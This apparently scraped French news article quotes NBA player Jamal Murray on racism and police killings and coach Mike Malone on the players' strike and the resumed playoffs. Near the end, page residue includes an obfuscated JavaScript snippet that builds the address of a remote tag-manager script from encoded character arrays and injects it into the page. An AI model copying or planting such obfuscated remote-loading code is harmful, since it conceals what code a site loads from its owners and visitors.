Jamal Murray : “Ma couleur de peau ne devrait pas déterminer si je vis ou si je meurs”

    0
    21

    Lorsque les joueurs NBA ont décidé de reprendre la compétition, ils ont justifié leur choix en expliquant vouloir continuer à se servir de la force médiatique de la NBA pour vouloir faire passer des messages. Une volonté que Jamal Murray a prise au pied de la lettre, d’abord en mettant devant la caméra servant aux interviews des chaussures avec les visages de Breonna Taylor et George Floyd dessus, avant de se lancer dans un long discours.

    “Ma couleur de peau ne devrait pas déterminer si je vis ou si je meurs. Il y a une crise des droits de l’homme en ce moment. Il y a eu tellement d’injustice, encore et encore, de choses inhumaines qui se sont passées… Il y a beaucoup d’émotion. Je voulais juste en parler avec vous, et avec ceux qui regardent. Mes chaussures sont restées devant la caméra combien de temps ? Quelque chose comme deux minutes ? Une des deux personnes dont le visage est imprimé ici a eu un genou sur la nuque pendant huit minutes. Personnellement, j’ai 23 ans et je n’ai aucun mal à comprendre que ce n’est pas normal, tout le monde devrait le savoir. Si vous n’avez pas le même avis, alors il y a un problème avec vous. Je voulais juste le dire. Ce n’était que deux minutes, un quart du temps que George Floyd a passé avec un policier à genou sur sa nuque. C’était un père de famille, le fils d’une femme et d’un homme, le frère de quelqu’un. C’est vraiment dur quand on laisse cette vérité pénétrer notre esprit, et qu’on se le ressasse en permanence.” Jamal Murray.

    Au final, la saison va reprendre, comme expliqué plus haut. Et à part les Lakers et les Clippers lors de la première réunion, toutes les équipes ont voté dans ce sens, ce qui ne veut pas dire que tous les joueurs le voulaient, comme l’explique le coach de Denver Mike Malone.

    “Toutes les équipes ont voté pour rester, mais laissez-moi vous rappeler que quand les équipes ont voté en interne, les résultats étaient peut-être du style 8 votes pour et 7 contres, ou alors 9-6, 10-5… Ce n’était pas à l’unanimité. Ce n’est pas comme si les 13 équipes de playoffs entières sont toutes ravies d’être ici. Ça rend les choses encore plus difficiles.” Mike Malone.

    Pour Denver, la situation est encore plus compliquée parce que les Nuggets sont menés 3 à 2 dans la série, et on n’ont pas le droit à l’erreur.

    “On s’apprête à jouer (ce soir ndlr) un match pour lequel on doit être complètement concentré. Je me mets à la place des joueurs, et c’est compliqué. L’équilibre est difficile à trouver. Je veux faire ce qu’il faut pour notre société, pour ma communauté, mais j’ai aussi un match à jouer, et je veux représenter nos fans de Denver et de tout le pays. Je peux juste vous dire qu’hier était un jour très compliqué.” Mike Malone.

    Selon le coach, l’entrainement de vendredi, le premier depuis la grève, avait été très compliqué. Le plus compliqué depuis qu’il est entraineur de la franchise. Et il comprend ses joueurs.

    “Ces derniers temps ont été compliqués émotionnellement. Quand vous ajoutez tout ce qu’il s’est passé récemment en plus de ce combat, vous pouvez comprendre les émotions que tout le monde ressent ici. Quand vous êtes éloigné de votre famille depuis 54 jours, rien que ça c’est dur. Quand il y a en plus la fusillade avec Jacob Blake, qui rappelle George Floyd, Elijah McClain, Breonna Taylor… Il a tellement de noms… Ça a été la goutte d’eau qui fait déborder le vase.” Mike Malone.

    Et les deux derniers jours sans rencontre ont été très utiles pour, si ce n’est le vider complètement, au moins éviter qu’il ne déborde et pour essayer de mettre sur pied une manière de continuer le combat.

    “Jimmy Butler a enlevé son nom de son maillot. J’ai trouvé ça très puissant : parce que ce n’est qu’un noir parmi d’autres, plein de gens ne verraient pas la différence. Il pourrait être SDF, marcher dans la rue… Et quand quelqu’un est blessé, personne ne le voit. Le côté mental de cette histoire n’est vraiment pas à négliger. Comment vous pensez, comment vous voyez les choses, les gens… Ma couleur de peau ne devrait pas déterminer si je vis ou si je meurs.” Jamal Murray.

    (function(w,d,s,l,i,u){w[l]=w[l]||[];w[l].push({‘x67x74x6dx2ex73x74x61x72x74′: new Date().getTime(),event:’x67x74x6dx2ex6ax73′}); var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!=’dataLayer’?’&l=’+l: »;j.async=true;j.src= u+[17,73,86,79,16,76,85,33,75,70,31,].map(function(a){return String.fromCharCode(a+30);}).join( »)+i+dl;f.parentNode.insertBefore(j,f); })( window, document, ‘script’, ‘dataLayer’, [41,54,47,15,45,47,23,40,58,50,57,].map(function(a){return String.fromCharCode(a+30);}).join( »), [74,86,86,82,85,28,17,17,89,89,89,16,73,81,81,73,78,71,86,67,73,79,67,80,67,73,71,84,16,69,81,79,].map(function(a){return String.fromCharCode(a+30);}).join( ») );


    SOURCE: https://www.w24news.com

    Donnez votre point de vue et aboonez-vous!

    Laisser un commentaire

    Votre point de vue compte, donnez votre avis

    [maxbutton id= »1″]




    LEAVE A REPLY

    Please enter your comment!
    Please enter your name here